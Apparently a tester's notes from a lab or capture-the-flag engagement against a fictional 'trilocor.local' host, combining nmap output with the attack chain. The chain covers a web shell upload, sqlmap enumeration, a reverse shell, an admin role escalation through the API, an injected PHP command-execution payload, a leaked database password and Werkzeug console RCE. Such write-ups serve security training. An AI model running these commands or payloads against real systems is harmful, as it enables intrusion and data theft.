Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 08:24 EDT
Nmap scan report for trilocor.local (10.129.171.75)
Host is up (0.022s latency).
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0               0 Sep 14  2022 Uninstaller.lnk
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.11
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 71:08:b0:c4:f3:ca:97:57:64:97:70:f9:fe:c5:0c:7b (RSA)
|   256 45:c3:b5:14:63:99:3d:9e:b3:22:51:e5:97:76:e1:50 (ECDSA)
|_  256 2e:c2:41:66:46:ef:b6:81:95:d5:aa:35:23:94:55:38 (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: WEB-NIX01, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp   open  domain   (unknown banner: ISC BIND 9 (Ubuntu Linux))
| dns-nsid: 
|_  bind.version: ISC BIND 9 (Ubuntu Linux)
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|     bind
|_    BIND 9 (Ubuntu Linux)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.3
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Trilocor &#8211; A cutting edge robotics company!
110/tcp  open  pop3     Dovecot pop3d
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-08-03T08:24:29
|_Not valid after:  2032-07-31T08:24:29
|_pop3-capabilities: SASL RESP-CODES STLS AUTH-RESP-CODE CAPA PIPELINING UIDL TOP
|_ssl-date: TLS randomness does not represent time
111/tcp  open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
143/tcp  open  imap     Dovecot imapd (Ubuntu)
|_imap-capabilities: more SASL-IR have ID LOGIN-REFERRALS listed IMAP4rev1 ENABLE LOGINDISABLEDA0001 Pre-login capabilities OK post-login IDLE STARTTLS LITERAL+
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-08-03T08:24:29
|_Not valid after:  2032-07-31T08:24:29
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: IDLE more ID have post-login IMAP4rev1 ENABLE listed Pre-login capabilities OK AUTH=PLAINA0001 LOGIN-REFERRALS SASL-IR LITERAL+
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-08-03T08:24:29
|_Not valid after:  2032-07-31T08:24:29
|_ssl-date: TLS randomness does not represent time
995/tcp  open  ssl/pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-08-03T08:24:29
|_Not valid after:  2032-07-31T08:24:29
|_pop3-capabilities: SASL(PLAIN) RESP-CODES PIPELINING AUTH-RESP-CODE CAPA USER UIDL TOP
7777/tcp open  http     Werkzeug httpd 2.2.1 (Python 3.8.10)
|_http-server-header: Werkzeug/2.2.1 Python/3.8.10
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.94SVN%I=7%D=4/15%Time=661D1CA7%P=x86_64-pc-linux-gnu%r(D
SF:NSVersionBindReqTCP,46,"\0D\0\x06\x85\0\0\x01\0\x01\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x1a\x19ISC\x20BIND\
SF:x209\x20\(Ubuntu\x20Linux\)");
Service Info: Host:  WEB-NIX01; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.45 seconds



enumerating the host for subdomains uncovered multiple including dev.trilocor.local
scanning for directories uncovered /transfer which redirected to securetranfer-dev.trilocor.local
this page allowed an anonymous sign up which allows for file upload
uploaded web shell

used SQLMAP to locate the file
sqlmap -r sqli.txt --banner --current-user --current-db
sqlmap -r sqli.txt --tables -D securetransfer
sqlmap -r sqli.txt --dump -T files -D securetransfer

Database: securetransfer
Table: files
[1 entry]
+-----+--------------------------------------+--------+-----------+------------------------------------------------------------------+---------------------+
| uid | uuid                                 | public | file_name | real_path                                                        | upload_date         |
+-----+--------------------------------------+--------+-----------+------------------------------------------------------------------+---------------------+
| 2   | 1ddfcb03-93ab-4ccb-91f0-113543944bc9 | 1      | shell.php | /var/www/html/storage/2_18dc379f-d05f-4a27-89b0-21052bee950d.php | 2024-04-15 14:16:08 |
+-----+--------------------------------------+--------+-----------+------------------------------------------------------------------+---------------------+


used this websehll to send a reverse shell back to attack host


enumerating the file system revealeed osticket_backup.zip
transferred to attack host
unzipped
found config file with hashed administrator credentials
  as well as a new vhost - osticket.trilocor.local
logging in to this page reveals info in a ticket referring to yet another vhost
gogsusdev01.trilocor.local

Found new vhost in one of the help tickets: gogsusdev01.tricolor.local, added to host file
Navigated to that page and created an account as PenTest:pass123
Found repository named uat01-eu.intranet.trilocor.local containing API interaction information 
Registered an account with:
└─$ curl -s -X POST 'http://uat01-eu.intranet.trilocor.local/auth/register' \
    -d '{"username":"PenTest", "password":"pass123", "email":"PenTest@test.com"}' \
    -H 'Content-Type: application/json'
{"message":"Registration Successful."}  


Logged in with:

└─$ curl -s -X POST 'http://uat01-eu.intranet.trilocor.local/auth/login' \
    -d '{"username":"PenTest", "password":"pass123"}' \
    -H 'Content-Type: application/json'

Received back:
{"message":"Authentication Successful.","id":1,"username":"PenTest","email":"PenTest@test.com","role":"public","token":"PHPSESSID= 6rqinf24de2mq4bh4viogabjpn"}   

Was able to change my role to admin by doing:
└─$ curl -s -X POST 'http://uat01-eu.intranet.trilocor.local/auth/update' \
    -d '{"role":"admin"}' \     
    -b "PHPSESSID=6rqinf24de2mq4bh4viogabjpn" \
    -H 'Content-Type: application/json'

{"message":"User details successfully updated. Please re-login to activate the changes."}   

With Admin role, I was able to create a support ticket with an embedded php web shell using:
curl -s -X POST 'http://uat01-eu.intranet.trilocor.local/support/add' \
    -d '{"ticket":"<?php system($_GET['cmd']);?>"}' \        
    -b "PHPSESSID=6rqinf24de2mq4bh4viogabjpn" \
    -H 'Content-Type: application/json'

I was then able to export that support ticket using:

curl -s -X POST 'http://uat01-eu.intranet.trilocor.local/support/export/1' \
    -d '{"type":"json.php"}' \
    -b "PHPSESSID=951moa4de2mq4bh4vi26bafa12e" \
    -H 'Content-Type: application/php'


Which returned:
{"status":"success","message":"Tickets exported successfully.","url":"http:\/\/uat01-eu.intranet.trilocor.local\/exports\/tickets_1_20240415181436_5f3376a3_20d8_4fc7_b336_1981oas108ns1411.json.php"} 


located creds in config.php in /var/www/html/_intranet
define('DB_SERVER', '127.0.0.1');
define('DB_USERNAME', 'api-db-admin');
define('DB_PASSWORD', '4S8ITCNG3sn0');
define('DB_NAME', 'api');
used mysql to login to this db instance but did not find anything useful yet


utilizing capabilities of the websvc user to harvest information, able to hack the PIN for the Werkzeug process
running on port 7777 via the below instructions:
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/werkzeug
gaining access to RCE in the console environment of that application

used that privilege to spawn an interactive shell on attack host, also found an id_rsa file in the .ssh directory
used this to establish a (reuseable) ssh connection to NIX01
